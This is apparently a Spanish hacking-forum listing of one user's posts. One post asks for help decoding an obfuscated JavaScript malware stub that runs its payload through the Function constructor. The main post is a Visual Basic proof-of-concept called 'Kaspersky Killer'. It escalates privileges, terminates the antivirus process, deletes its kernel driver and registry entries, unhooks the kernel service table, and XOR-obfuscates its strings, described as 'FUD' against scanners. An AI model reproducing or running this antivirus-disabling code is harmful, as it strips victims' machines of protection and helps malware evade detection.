
 

 




1  Seguridad Informática / Análisis y Diseño de Malware / Solicitud ayuda con JS en: 21 Junio 2015, 16:34 pm
Buenos días, hace mucho que no venía por elhacker.net.

Solicito la ayuda de alguien en la medida de lo posible: quisiera saber si alguien ha descifrado algún malware de JS.

Código:
// Decoder stub for an obfuscated payload. `E` is not defined anywhere in this
// snippet: it is the encoded string, which must come from elsewhere in the
// original file. b = decoded numbers, Q = decoded source text, J = chunk width.
b = [], Q = "", J = 3;

// `prompt` exists in browsers but usually not in script engines or sandboxes.
// With it present v becomes 3 and J becomes 4 (post-increment); without it J
// stays 3 and v is assigned Math below. This looks like an environment check —
// the chunk width, and therefore the decoded bytes, differ between the two.
if (typeof prompt != "undefined") {
  var v = J++;
}
// Aliases: k = parseInt, i = "slice", z = "fromCharCode". They only hide the
// method names from naive string matching; nothing else is gained.
var v = v || Math, k = parseInt, i = "slice", z = "fromCharCode";

// Cut E into J-wide chunks and parse each as a base-23 number into b.
// Note the target index uses Z / 3 regardless of J, so with J = 4 every
// fourth slot of b is left undefined (and reads as 0 in the XOR below).
for (var Z = 0; Z < E.length;) b[~~(Z / 3)] = k(E[i](Z, Z += J), 23);
// XOR adjacent pairs into characters, appending to Q.
// Math["floor"].constructor is the Function constructor (the .constructor of
// any function is Function), so N(Q)() compiles Q as a function body and runs
// it: an eval() without the word "eval". For analysis, replace `N(Q)()` with
// something that prints Q and never execute the result.
for (var X = 0; X < b.length; X += 2) Q += String[z](b[X] ^ b[X + 1]);var N = Math["floor"].constructor; N(Q)();

Apenas comienzo con JS y me sería de mucha ayuda descifrar el código anterior; me quedo varado en la última instrucción, en realidad no entiendo qué hace:
Código:
Math["floor"].constructor;

Por lo que he consultado, es una función matemática para manejo de números enteros; si alguien me pudiera colaborar, quedo agradecido.

XcryptOR
2  Programación / Programación Visual Basic / Bypass tiempo de espera de Megaupload en: 13 Julio 2009, 06:48 am
Bueno, me pareció interesante hacer esto en VB [aunque es una lamerada] aprovechando el JavaScript que se encarga de hacerlo, y como dice el título sirve para evitar el tiempo de espera para descargas de Megaupload. ;D

Source
3  Programación / Programación Visual Basic / [POC] Kaspersky Killer en: 13 Abril 2009, 19:55 pm
Bueno, como no he tenido tiempo para depurar el código, lo dejo a su disposición; espero que les sirva como ejemplo.




Modulo1:
Código
  1. '---------------------------------------------------------------------------------------
  2. ' Project     : KillKav [Kaspersky Killer]
  3. ' Date        : 19/03/2009 18:10
  4. ' Author      : XcryptOR
  5. ' Purpose     : Kill Kaspersky Antivirus, Delete Klif.sys Driver & Related Registry Entries
  6. ' Versions    : Kaspersky Antivirus 6,7,8, kaspersky 2009 y KIS 2009
  7. ' OS          : Windows XP Sp1, Sp2, Sp3. Vista(it needs some changes but works)
  8. ' Bugs        : When the KLIM5.sys (Kaspersky NDIS Filter) registry entry is deleted, after the next reboot
  9. '               we can't access the internet because the filter was not uninstalled; the function
  10. '               Clean_TCPIP_Stack does the work, but I can't use it when killing Kaspersky, only on the
  11. '               next reboot. I believe that is not a problem to fix.
  12. '               It can be improved very much; it's only a POC
  13. ' Credits     : Iceboy, Syntax_err, and all the chinese Crew of vbgood
  14. '---------------------------------------------------------------------------------------
  ' Entry point of the POC. Enables SeDebugPrivilege (SE_DEBUG_PRIVILEGE = 20,
  ' Modulo3) through RtlAdjustPrivilege, reads the kernel service table
  ' (GetSSDT, Modulo4), terminates the AV process and deletes its driver
  ' (Fuck_KAV), then removes its registry entries (KillRegs, Modulo3).
  ' FindNtdllExport is not on this page.
  Private Sub Main()
      EnablePrivilege SE_DEBUG_PRIVILEGE, True
      FindNtdllExport
      GetSSDT
      Fuck_KAV
      KillRegs

  End Sub
  ' Terminates the AV process and deletes its filter driver file.
  ' Every string literal is XOR-obfuscated with Crypt (Modulo3); the plaintext
  ' in the author's trailing comments is what each call actually uses.
  ' Detection angle: OpenProcess with PROCESS_ALL_ACCESS on the AV process,
  ' followed by ZwDeleteFile on a \??\...\Drivers\*.sys path (see DeleteDriver).
  Private Sub Fuck_KAV()
      Dim hProcess        As Long
      Dim Pid             As Long

      Pid = GetPIDByName(Crypt("¹®¨ö½ ½")) ' Get The PID By Name in this case AVP.exe

      hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, Pid)
      If hProcess = 0 Then
              ' LzOpenProcess is not on this page; presumably an alternative opener used when OpenProcess is blocked — verify.
              hProcess = LzOpenProcess(PROCESS_ALL_ACCESS, Pid)
      End If

      ' MyTerminateProcess is not on this page either. hProcess is never closed in this Sub.
      Call MyTerminateProcess(hProcess, 0)

      ' strings are XOR crypted, to avoid some heuristics, the source is FUD: scan on NVT and virustotal
      If DeleteDriver(Crypt("„ç焛ℱ¶¼·¯«„‹¡«¬½µëê„œª±®½ª«„“´±¾ö«¡«")) = True Then '\??\C:\Windows\System32\Drivers\Klif.sys
              ' Informational MsgBox; its text is decoded at run time like the other strings.
              MsgBox Crypt("œª±®½ªø“´±¾ö«¡«ø´±µ±¶¹¼·ø ±¬·«¹µ½¶¬½") & vbCrLf & _
                     Crypt("ùø“¹«¨½ª«³¡ø°¹ø«±¼·ø´±µ±¶¹¼·ø ±¬·«¹µ½¶¬½øy"), _
                     vbExclamation, Crypt("“¹«¨½ª«³¡ø“±´´½ªøõø›·¼½¼øš¡ø€»ª¡¨¬·ª")
      End If
  End Sub
  43.  

Modulo2:
Código
  1. Public Enum SYSTEM_INFORMATION_CLASS
  2.    SystemBasicInformation
  3.    SystemHandleInformation
  4. End Enum
  5.  
  6. Public Declare Function ZwQuerySystemInformation Lib "ntdll.dll" ( _
  7. ByVal SystemInformationClass As SYSTEM_INFORMATION_CLASS, _
  8. ByVal pSystemInformation As Long, _
  9. ByVal SystemInformationLength As Long, _
  10. ByRef ReturnLength As Long) As Long
  11.  
  12. Public Type SYSTEM_HANDLE_TABLE_ENTRY_INFO
  13.    UniqueProcessId         As Integer
  14.    CreatorBackTraceIndex   As Integer
  15.    ObjectTypeIndex         As Byte
  16.    HandleAttributes        As Byte
  17.    HandleValue             As Integer
  18.    pObject                 As Long
  19.    GrantedAccess           As Long
  20. End Type
  21.  
  22. Public Type SYSTEM_HANDLE_INFORMATION
  23.    NumberOfHandles         As Long
  24.    Handles(1 To 1)         As SYSTEM_HANDLE_TABLE_ENTRY_INFO
  25. End Type
  26.  
  27. Public Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
  28. Public Const STATUS_ACCESS_DENIED = &HC0000022
  29.  
  30. Public Declare Function ZwWriteVirtualMemory Lib "ntdll.dll" ( _
  31. ByVal ProcessHandle As Long, _
  32. ByVal BaseAddress As Long, _
  33. ByVal pBuffer As Long, _
  34. ByVal NumberOfBytesToWrite As Long, _
  35. ByRef NumberOfBytesWritten As Long) As Long
  36.  
  37. Public Declare Function ZwOpenProcess Lib "ntdll.dll" ( _
  38. ByRef ProcessHandle As Long, _
  39. ByVal AccessMask As Long, _
  40. ByRef ObjectAttributes As OBJECT_ATTRIBUTES, _
  41. ByRef ClientId As CLIENT_ID) As Long
  42.  
  43. Public Type OBJECT_ATTRIBUTES
  44.    Length                  As Long
  45.    RootDirectory           As Long
  46.    ObjectName              As Long
  47.    Attributes              As Long
  48.    SecurityDescriptor      As Long
  49.    SecurityQualityOfService As Long
  50. End Type
  51.  
  52. Public Type CLIENT_ID
  53.    UniqueProcess           As Long
  54.    UniqueThread            As Long
  55. End Type
  56.  
  57. Public Const PROCESS_QUERY_INFORMATION      As Long = &H400
  58. Public Const STATUS_INVALID_CID             As Long = &HC000000B
  59.  
  60. Public Declare Function ZwClose Lib "ntdll.dll" ( _
  61. ByVal ObjectHandle As Long) As Long
  62.  
  63. Public Const ZwGetCurrentProcess            As Long = -1
  64. Public Const ZwGetCurrentThread             As Long = -2
  65. Public Const ZwCurrentProcess               As Long = ZwGetCurrentProcess
  66. Public Const ZwCurrentThread                As Long = ZwGetCurrentThread
  67.  
  68. Public Declare Function ZwCreateJobObject Lib "ntdll.dll" ( _
  69. ByRef JobHandle As Long, _
  70. ByVal DesiredAccess As Long, _
  71. ByRef ObjectAttributes As OBJECT_ATTRIBUTES) As Long
  72.  
  73. Public Declare Function ZwAssignProcessToJobObject Lib "ntdll.dll" ( _
  74. ByVal JobHandle As Long, _
  75. ByVal ProcessHandle As Long) As Long
  76.  
  77. Public Declare Function ZwTerminateJobObject Lib "ntdll.dll" ( _
  78. ByVal JobHandle As Long, _
  79. ByVal ExitStatus As Long) As Long
  80.  
  81. Public Const OBJ_INHERIT = &H2
  82. Public Const STANDARD_RIGHTS_REQUIRED       As Long = &HF0000
  83. Public Const SYNCHRONIZE                    As Long = &H100000
  84. Public Const JOB_OBJECT_ALL_ACCESS          As Long = STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &H1F
  85. Public Const PROCESS_DUP_HANDLE             As Long = &H40
  86. Public Const PROCESS_ALL_ACCESS             As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
  87. Public Const THREAD_ALL_ACCESS              As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &H3FF)
  88. Public Const OB_TYPE_PROCESS                As Long = &H5
  89.  
  90. Public Type PROCESS_BASIC_INFORMATION
  91.    ExitStatus              As Long
  92.    PebBaseAddress          As Long
  93.    AffinityMask            As Long
  94.    BasePriority            As Long
  95.    UniqueProcessId         As Long
  96.    InheritedFromUniqueProcessId As Long
  97. End Type
  98.  
  99. Public Declare Function ZwDuplicateObject Lib "ntdll.dll" ( _
  100. ByVal SourceProcessHandle As Long, _
  101. ByVal SourceHandle As Long, _
  102. ByVal TargetProcessHandle As Long, _
  103. ByRef TargetHandle As Long, _
  104. ByVal DesiredAccess As Long, _
  105. ByVal HandleAttributes As Long, _
  106. ByVal Options As Long) As Long
  107.  
  108. Public Const DUPLICATE_CLOSE_SOURCE = &H1
  109. Public Const DUPLICATE_SAME_ACCESS = &H2
  110. Public Const DUPLICATE_SAME_ATTRIBUTES = &H4
  111.  
  112. Public Declare Function ZwQueryInformationProcess Lib "ntdll.dll" ( _
  113. ByVal ProcessHandle As Long, _
  114. ByVal ProcessInformationClass As PROCESSINFOCLASS, _
  115. ByVal ProcessInformation As Long, _
  116. ByVal ProcessInformationLength As Long, _
  117. ByRef ReturnLength As Long) As Long
  118.  
  119. Public Enum PROCESSINFOCLASS
  120.        ProcessBasicInformation
  121. End Enum
  122.  
  123. Public Const STATUS_SUCCESS                 As Long = &H0
  124. Public Const STATUS_INVALID_PARAMETER       As Long = &HC000000D
  125.  
  126. Public Declare Function ZwTerminateProcess Lib "ntdll.dll" ( _
  127. ByVal ProcessHandle As Long, _
  128. ByVal ExitStatus As Long) As Long
  129.  
  130. Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
  131.  
  132. Public Type SECURITY_ATTRIBUTES
  133.    nLength                 As Long
  134.    lpSecurityDescriptor    As Long
  135.    bInheritHandle          As Long
  136. End Type
  137.  
  138. Public Type a_my
  139.    name                    As String
  140.    Pid                     As Long
  141.    tid                     As Long
  142.    Handle                  As Long
  143. End Type
  144.  
  145. Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" ( _
  146. ByVal lpModuleName As String) As Long
  147.  
  148. Public Declare Function GetProcAddress Lib "kernel32" ( _
  149. ByVal hModule As Long, _
  150. ByVal lpProcName As String) As Long
  151.  
  ' True for any NTSTATUS whose sign bit is clear (success and informational
  ' codes); False for codes that are negative when read as a signed Long.
  Public Function NT_SUCCESS(ByVal Status As Long) As Boolean
      NT_SUCCESS = Not (Status < 0)
  End Function
  155.  
  ' Copies cch bytes from Src to Dest inside this process, using
  ' ZwWriteVirtualMemory on the current-process pseudo handle instead of a
  ' kernel32 import. The byte count the call reports is discarded, as is its status.
  Public Sub CopyMemory(ByVal Dest As Long, ByVal Src As Long, ByVal cch As Long)
      Dim cbDone As Long
      ZwWriteVirtualMemory ZwCurrentProcess, Dest, Src, cch, cbDone
  End Sub
  160.  
  ' Linear search: True if dwItem equals some element of dwArray, else False.
  ' dwItem is an untyped (Variant) parameter, so the comparison is VB's
  ' Variant-to-Long equality. LBound/UBound raise if dwArray was never ReDim'd.
  Public Function IsItemInArray(ByVal dwItem, ByRef dwArray() As Long) As Boolean
      Dim pos As Long
      IsItemInArray = False
      pos = LBound(dwArray)
      Do While pos <= UBound(dwArray)
          If dwArray(pos) = dwItem Then
              IsItemInArray = True
              Exit Function
          End If
          pos = pos + 1
      Loop
  End Function
  168.  
  ' Appends dwItem to dwArray unless it is already present. Any run-time error
  ' (for example UBound on an array that was never ReDim'd) jumps to ErrHdl
  ' and the array is left exactly as it was; nothing is reported.
  Public Sub AddItemToArray(ByVal dwItem As Long, ByRef dwArray() As Long)
  On Error GoTo ErrHdl
      Dim newLast As Long

      If IsItemInArray(dwItem, dwArray) = True Then Exit Sub

      newLast = UBound(dwArray) + 1
      ReDim Preserve dwArray(newLast)
      dwArray(newLast) = dwItem
  ErrHdl:

  End Sub
  179.  

Modulo3:
Código
  1. Private Declare Function SHDeleteKey Lib "shlwapi.dll" Alias "SHDeleteKeyA" ( _
  2. ByVal hKey As Long, _
  3. ByVal pszSubKey As String) As Long  ' Delete a key and subkeys from registry
  4.  
  5. Private Declare Function RegOpenKeyEx Lib "advapi32.dll" _
  6. Alias "RegOpenKeyExA" ( _
  7. ByVal hKey As Long, _
  8. ByVal lpSubKey As String, _
  9. ByVal ulOptions As Long, _
  10. ByVal samDesired As Long, _
  11. phkResult As Long) As Long
  12.  
  13. Private Declare Function RegCloseKey Lib "advapi32.dll" ( _
  14. ByVal hKey As Long) As Long
  15.  
  16. Private Declare Function RegDeleteValue Lib "advapi32.dll" _
  17. Alias "RegDeleteValueA" ( _
  18. ByVal hKey As Long, _
  19. ByVal lpValueName As String) As Long
  20.  
  21. Private Const REG_SZ                                As Long = 1
  22. Private Const REG_EXPAND_SZ                         As Long = 2
  23. Private Const REG_BINARY                            As Long = 3
  24. Private Const REG_DWORD                             As Long = 4
  25. Private Const REG_MULTI_SZ                          As Long = 7
  26.  
  27. Private Const KEY_QUERY_VALUE                       As Long = &H1
  28. Private Const KEY_ALL_ACCESS                        As Long = &H3F
  29. Private Const REG_OPTION_NON_VOLATILE               As Long = 0
  30.  
  31. Private Const HKEY_CLASSES_ROOT                     As Long = &H80000000
  32. Private Const HKEY_CURRENT_CONFIG                   As Long = &H80000005
  33. Private Const HKEY_CURRENT_USER                     As Long = &H80000001
  34. Private Const HKEY_DYN_DATA                         As Long = &H80000006
  35. Private Const HKEY_LOCAL_MACHINE                    As Long = &H80000002
  36. Private Const HKEY_PERFORMANCE_DATA                 As Long = &H80000004
  37. Private Const HKEY_USERS                            As Long = &H80000003
  38. Private Declare Function ZwDeleteFile Lib "ntdll.dll" ( _
  39. ByRef ObjectAttributes As OBJECT_ATTRIBUTES) As Long
  40.  
  41. Private Declare Sub RtlInitUnicodeString Lib "ntdll.dll" ( _
  42. ByVal DestinationString As Long, _
  43. ByVal SourceString As Long)
  44.  
  45. Private Type UNICODE_STRING
  46.        Length              As Integer
  47.        MaximumLength       As Integer
  48.        Buffer              As String
  49. End Type
  50.  
  51. Private Type OBJECT_ATTRIBUTES
  52.        Length                      As Long
  53.        RootDirectory               As Long
  54.        ObjectName                  As Long
  55.        Attributes                  As Long
  56.        SecurityDescriptor          As Long
  57.        SecurityQualityOfService    As Long
  58. End Type
  59.  
  60. Private Const OBJ_CASE_INSENSITIVE          As Long = &H40
  61.  
  62. Public Const SE_SHUTDOWN_PRIVILEGE          As Long = 19
  63. Public Const SE_DEBUG_PRIVILEGE             As Long = 20
  64.  
  65. Private Const STATUS_NO_TOKEN               As Long = &HC000007C
  66.  
  67. Private Declare Function RtlAdjustPrivilege Lib "ntdll.dll" ( _
  68. ByVal Privilege As Long, _
  69. ByVal Enable As Boolean, _
  70. ByVal Client As Boolean, _
  71. WasEnabled As Long) As Long
  72.  
  73. Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" ( _
  74. ByVal lFlags As Long, _
  75. ByVal lProcessID As Long) As Long
  76. '---
  77. Private Declare Function Process32First Lib "kernel32" ( _
  78. ByVal hSnapShot As Long, _
  79. uProcess As PROCESSENTRY32) As Long
  80. '---
  81. Private Declare Function Process32Next Lib "kernel32" ( _
  82. ByVal hSnapShot As Long, _
  83. uProcess As PROCESSENTRY32) As Long
  84. '---
  85. Private Const TH32CS_SNAPHEAPLIST           As Long = &H1
  86. Private Const TH32CS_SNAPPROCESS            As Long = &H2
  87. Private Const TH32CS_SNAPTHREAD             As Long = &H4
  88. Private Const TH32CS_SNAPMODULE             As Long = &H8
  89. Private Const TH32CS_SNAPALL                As Long = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
  90. Private Const MAX_PATH                      As Long = 260
  91.  
  92. Private Type PROCESSENTRY32
  93.        dwSize              As Long
  94.        cntUsage            As Long
  95.        th32ProcessID       As Long
  96.        th32DefaultHeapID   As Long
  97.        th32ModuleID        As Long
  98.        cntThreads          As Long
  99.        th32ParentProcessID As Long
  100.        pcPriClassBase      As Long
  101.        dwFlags             As Long
  102.        szExeFile           As String * MAX_PATH
  103. End Type
  104.  
  105. Public Declare Function WinExec Lib "kernel32" ( _
  106. ByVal lpCmdLine As String, _
  107. ByVal nCmdShow As Long) As Long
  108.  
  109. Public Const SW_HIDE = 0
  110.  
  111. '========================================================================================
  112. '================================ Get ID Process By Name ================================
  113. '========================================================================================
  ' Looks up a process id by image file name (case-insensitive).
  ' Walks a Toolhelp snapshot of all processes and returns th32ProcessID of the
  ' first entry whose szExeFile equals PName; returns 0 when nothing matches.
  ' The snapshot handle is never closed here.
  Public Function GetPIDByName(ByVal PName As String) As Long
      Dim hSnap       As Long
      Dim entry       As PROCESSENTRY32
      Dim nulPos      As Long
      Dim more        As Long

      hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
      entry.dwSize = Len(entry)
      PName = LCase(PName)

      more = Process32First(hSnap, entry)
      Do Until more = 0
          ' szExeFile is a fixed-length buffer: cut it at the first NUL
          nulPos = InStr(1, entry.szExeFile, Chr(0))
          If LCase(Left(entry.szExeFile, nulPos - 1)) = PName Then
              GetPIDByName = entry.th32ProcessID
              Exit Function
          End If
          more = Process32Next(hSnap, entry)
      Loop
  End Function
  131.  
  132. '========================================================================================
  133. '==================================== Get Privileges ====================================
  134. '========================================================================================
  ' Enables (or disables) one privilege through RtlAdjustPrivilege.
  ' The first attempt passes Client = True (presumably the thread token); if
  ' that fails with STATUS_NO_TOKEN the call is repeated with Client = False
  ' (presumably the process token) — confirm against ntdll documentation.
  ' Returns True only when the final status is 0. Enable is ByRef (VB default).
  Public Function EnablePrivilege(ByVal Privilege As Long, Enable As Boolean) As Boolean
      Dim status      As Long
      Dim prevState   As Long

      status = RtlAdjustPrivilege(Privilege, Enable, True, prevState)
      If status = STATUS_NO_TOKEN Then status = RtlAdjustPrivilege(Privilege, Enable, False, prevState)

      EnablePrivilege = (status = 0)
  End Function
  148.  
  149. '========================================================================================
  150. '============================= Simple XOR String Encryption =============================
  151. '========================================================================================
  ' Symmetric XOR obfuscation: every character is XORed with 216 (216 Mod 255),
  ' so Crypt(Crypt(s)) = s. It hides strings from signature matching and is
  ' equally trivial to undo — apply the same XOR to recover the plaintext.
  ' On Error Resume Next silently skips any character that cannot be converted.
  Public Function Crypt(txt As String) As String
      On Error Resume Next
      Dim pos     As Long
      Dim code    As Long
      Dim result  As String

      For pos = 1 To Len(txt)
          code = Asc(Mid(txt, pos, 1))
          result = result & Chr(code Xor 216)
      Next
      Crypt = result
  End Function
  164.  
  165. '========================================================================================
  166. '====================== Initialize Object Attributes Structure ==========================
  167. '========================================================================================
  ' Fills an OBJECT_ATTRIBUTES for the native API: Length is the structure
  ' size, ObjectName is a pointer to the caller's UNICODE_STRING (which must
  ' therefore outlive the call), SecurityQualityOfService is always NULL.
  Private Sub InicializarOA(ByRef InitializedAttributes As OBJECT_ATTRIBUTES, _
                           ByRef ObjectName As UNICODE_STRING, _
                           ByVal Attributes As Long, _
                           ByVal RootDirectory As Long, _
                           ByVal SecurityDescriptor As Long)
      InitializedAttributes.Length = LenB(InitializedAttributes)
      InitializedAttributes.RootDirectory = RootDirectory
      InitializedAttributes.ObjectName = VarPtr(ObjectName)
      InitializedAttributes.Attributes = Attributes
      InitializedAttributes.SecurityDescriptor = SecurityDescriptor
      InitializedAttributes.SecurityQualityOfService = 0
  End Sub
  182.  
  183. '========================================================================================
  184. '=============================== Delete KLIF.sys Driver =================================
  185. '========================================================================================
  ' Deletes a file by native path through ZwDeleteFile rather than the Win32
  ' DeleteFile. Returns True only on an NT success status; because of
  ' On Error Resume Next, False is also returned when a VB-level error stopped
  ' the call from happening at all.
  Public Function DeleteDriver(StrDriverPath As String) As Boolean
  On Error Resume Next
      Dim OA          As OBJECT_ATTRIBUTES
      Dim UStrPath    As UNICODE_STRING
      ' The path must be in native-API format, e.g. "\??\C:\Windows\System32\Drivers\Klif.sys"
      RtlInitUnicodeString ByVal VarPtr(UStrPath), StrPtr(StrDriverPath)
      InicializarOA OA, UStrPath, OBJ_CASE_INSENSITIVE, 0, 0

      If NT_SUCCESS(ZwDeleteFile(OA)) Then
          DeleteDriver = True
      End If
  End Function
  197.  
  198. '===================================================================================
  199. '================== Delete Registry Entries of all Kasper Services =================
  200. '===================================================================================
  ' Removes the product's service registration and persistence.
  ' GetHKEY(3) = HKEY_LOCAL_MACHINE, GetHKEY(1) = HKEY_CLASSES_ROOT; the
  ' plaintext of each obfuscated key is in the author's trailing comments.
  ' SHDeleteKey results are dropped in DeleteAllKeys, so partial failures are
  ' silent. Detection angle: deletion of HKLM\SYSTEM\CurrentControlSet\Services
  ' keys belonging to security products, and of a vendor Run value.
  Public Sub KillRegs()
      DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„™Žˆ")              '"SYSTEM\CurrentControlSet\Services\AVP"
      DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„³´é")              '"SYSTEM\CurrentControlSet\Services\kl1"
      DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„“”‘ž")             '"SYSTEM\CurrentControlSet\Services\KLIF"
      DeleteAllKeys GetHKEY(3), Crypt("‹‹Œ•„›­ªª½¶¬›·¶¬ª·´‹½¬„‹½ª®±»½«„³´±µí")            '"SYSTEM\CurrentControlSet\Services\klim5"
      DeleteAllKeys GetHKEY(3), Crypt("‹·¾¬¯¹ª½„“¹«¨½ª«³¡”¹º")                              '"Software\KasperskyLab"
      DeleteAllKeys GetHKEY(1), Crypt("›”‹‘œ„£¼¼êëèààèõìáí¹õéé¼éõºèîìõèèàèìཻ꾻í¥")       '"CLSID\{dd230880-495a-11d1-b064-008048ec2fc5}" : Remove from Context Menu
      DeleteKey Crypt("‹·¾¬¯¹ª½„•±»ª·«·¾¬„±¶¼·¯«„›­ªª½¶¬Ž½ª«±·¶„Š­¶"), Crypt("¹®¨"), 3     '"Software\Microsoft\Windows\CurrentVersion\Run", "avp"
  End Sub
  210.  
  211. '===================================================================================
  212. '========================= Eliminar el valor del Registro ==========================
  213. '===================================================================================
  ' Deletes value nKey under subkey sKey of the root chosen by RegKey (see
  ' GetHKEY). All three parameters are untyped Variants. Every return code is
  ' stored in l and ignored, and On Error Resume Next means a failed
  ' RegOpenKeyEx still leads to RegDeleteValue/RegCloseKey on hKey = 0.
  Public Sub DeleteKey(sKey, nKey, RegKey)
      On Error Resume Next
      Dim RK          As Long
      Dim l           As Long
      Dim hKey        As Long
      l = RegOpenKeyEx(GetHKEY(RegKey), sKey, 0, KEY_ALL_ACCESS, hKey)
      l = RegDeleteValue(hKey, nKey)
      l = RegCloseKey(hKey)
  End Sub
  223.  
  224. '===================================================================================
  225. '===================== Delete Keys and Subkeys from Registry =======================
  226. '===================================================================================
  ' Recursively deletes key and all its subkeys with SHDeleteKey.
  ' hKey is declared As String although callers pass the Long root handle from
  ' GetHKEY and SHDeleteKey is declared with a Long; VB converts the value both
  ' ways, which presumably round-trips but is fragile. lResult is never checked.
  Private Sub DeleteAllKeys(hKey As String, key As String)
      Dim lResult As Long
      lResult = SHDeleteKey(hKey, key)
  End Sub
  231.  
  ' Maps a small index to a predefined registry root: 1 = HKEY_CLASSES_ROOT,
  ' 2 = HKEY_CURRENT_USER, 3 = HKEY_LOCAL_MACHINE. No return type is declared,
  ' so the result is a Variant, and it stays Empty for any other index.
  Private Function GetHKEY(RegKey)
      On Error Resume Next
      If RegKey = 1 Then
          GetHKEY = HKEY_CLASSES_ROOT
      ElseIf RegKey = 2 Then
          GetHKEY = HKEY_CURRENT_USER
      ElseIf RegKey = 3 Then
          GetHKEY = HKEY_LOCAL_MACHINE
      End If
  End Function
  243.  
  244. '===================================================================================
  245. '=================== Clean TCP/IP to uninstall Klim5.sys NDIS ======================
  246. '===================================================================================
  ' Resets the TCP/IP and Winsock stacks by launching netsh twice, hidden
  ' (SW_HIDE). Per the Modulo1 header this is meant for the reboot that follows
  ' removing the NDIS filter's registry entry. WinExec returns as soon as the
  ' process is started, so DoEvents does not wait for the first reset to finish.
  Public Sub Clean_TCPIP_Stack()
  WinExec "netsh int ip reset", SW_HIDE
  DoEvents
  WinExec "netsh winsock reset", SW_HIDE
  End Sub
  252.  
  253.  


Modulo4:
Código
  1. ' -----------------------------------------------------------------------------------
  2. ' Module        : mSSDTUnhook
  3. ' Author        : Iceboy
  4. ' Purpose       : Unhook APIs i used this great work of Iceboy to unhook Apis from Kaspersky
  5. ' -----------------------------------------------------------------------------------
  6. Option Explicit
  7.  
  8. Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" ( _
  9. ByVal lpLibFileName As String) As Long
  10.  
  11. Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
  12. ByVal pDst As Long, _
  13. ByVal pSrc As Long, _
  14. ByVal ByteLen As Long)
  15.  
  16. Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" ( _
  17. ByVal lpString As Long) As Long
  18.  
  19. Private Declare Function LoadLibraryEx Lib "kernel32" Alias "LoadLibraryExA" ( _
  20. ByVal lpLibFileName As Long, _
  21. ByVal hFile As Long, _
  22. ByVal dwFlags As Long) As Long
  23.  
  24. Private Declare Function FreeLibrary Lib "kernel32" ( _
  25. ByVal hLibModule As Long) As Long
  26.  
  27. Private Declare Function GetProcAddress Lib "kernel32" ( _
  28. ByVal hModule As Long, _
  29. ByVal lpProcName As String) As Long
  30.  
  31. Private Declare Function ZwQuerySystemInformation Lib "ntdll.dll" ( _
  32. ByVal SystemInformationClass As SYSTEM_INFORMATION_CLASS, _
  33. ByVal pSystemInformation As Long, _
  34. ByVal SystemInformationLength As Long, _
  35. ByVal pReturnLength As Long) As Long
  36.  
  37. Private Declare Function ZwSystemDebugControl Lib "ntdll.dll" ( _
  38. ByVal ControlCode As SYSDBG_COMMAND, _
  39. ByVal pInputBuffer As Long, _
  40. ByVal InputBufferLength As Long, _
  41. ByVal pOutputBuffer As Long, _
  42. ByVal OutputBufferLength As Long, _
  43. ByVal pReturnLength As Long) As Long
  44.  
  45. Public Enum SYSDBG_COMMAND
  46.    SysDbgReadVirtualMemory = 8
  47.    SysDbgWriteVirtualMemory = 9
  48. End Enum
  49.  
  50. Private Enum SYSTEM_INFORMATION_CLASS
  51.    SystemModuleInformation = 11
  52. End Enum
  53.  
  54. Private Type IMAGE_DOS_HEADER
  55.    e_magic                 As Integer
  56.    Unused(0 To 57)         As Byte
  57.    e_lfanew                As Long
  58. End Type
  59.  
  60. Private Type IMAGE_NT_HEADER
  61.    Signature               As Long
  62.    Unused1(0 To 15)        As Byte
  63.    SizeOfOptionalHeader    As Integer
  64.    Characteristics         As Integer
  65.    Magic                   As Integer
  66.    Unused3(0 To 25)        As Byte
  67.    ImageBase               As Long
  68.    Unused4(0 To 23)        As Byte
  69.    SizeOfImage             As Long
  70.    Unused5(0 To 31)        As Byte
  71.    NumberOfRvaAndSizes     As Long
  72.    ExportTableRva          As Long
  73.    ExportTableSize         As Long
  74.    Unused6(0 To 31)        As Byte
  75.    RelocationTableRva      As Long
  76.    RelocationTableSize     As Long
  77. End Type
  78.  
  79. Private Type IMAGE_EXPORT_DIRECTORY
  80.    Unused(0 To 11)         As Byte
  81.    name                    As Long
  82.    Base                    As Long
  83.    NumberOfFunctions       As Long
  84.    NumberOfNames           As Long
  85.    AddressOfFunctions      As Long
  86.    AddressOfNames          As Long
  87.    AddressOfOrdinals       As Long
  88. End Type
  89.  
  90. Private Type IMAGE_BASE_RELOCATION
  91.    VirtualAddress          As Long
  92.    SizeOfBlock             As Long
  93. End Type
  94.  
  95. Private Type IMAGE_FIXED_ENTRY
  96.    Offset                  As Long
  97.    Type                    As Long
  98. End Type
  99.  
  100. Private Type ModuleInformation
  101.    Reserved(7)             As Byte
  102.    Base                    As Long
  103.    Size                    As Long
  104.    Flags                   As Long
  105.    Index                   As Integer
  106.    Unknown                 As Integer
  107.    Loadcount               As Integer
  108.    ModuleNameOffset        As Integer
  109.    ImageName(250)          As long
  110. End Type
  111.  
  112. Private Type MEMORY_CHUNKS
  113.    Address                 As Long
  114.    pData                   As Long
  115.    Length                  As Long
  116. End Type
  117.  
  118. Private Const DONT_RESOLVE_DLL_REFERENCES   As Long = 1
  119. Private Const IMAGE_REL_BASED_HIGHLOW       As Long = 3
  120. Private Const IMAGE_FILE_RELOCS_STRIPPED    As Integer = 1
  121.  
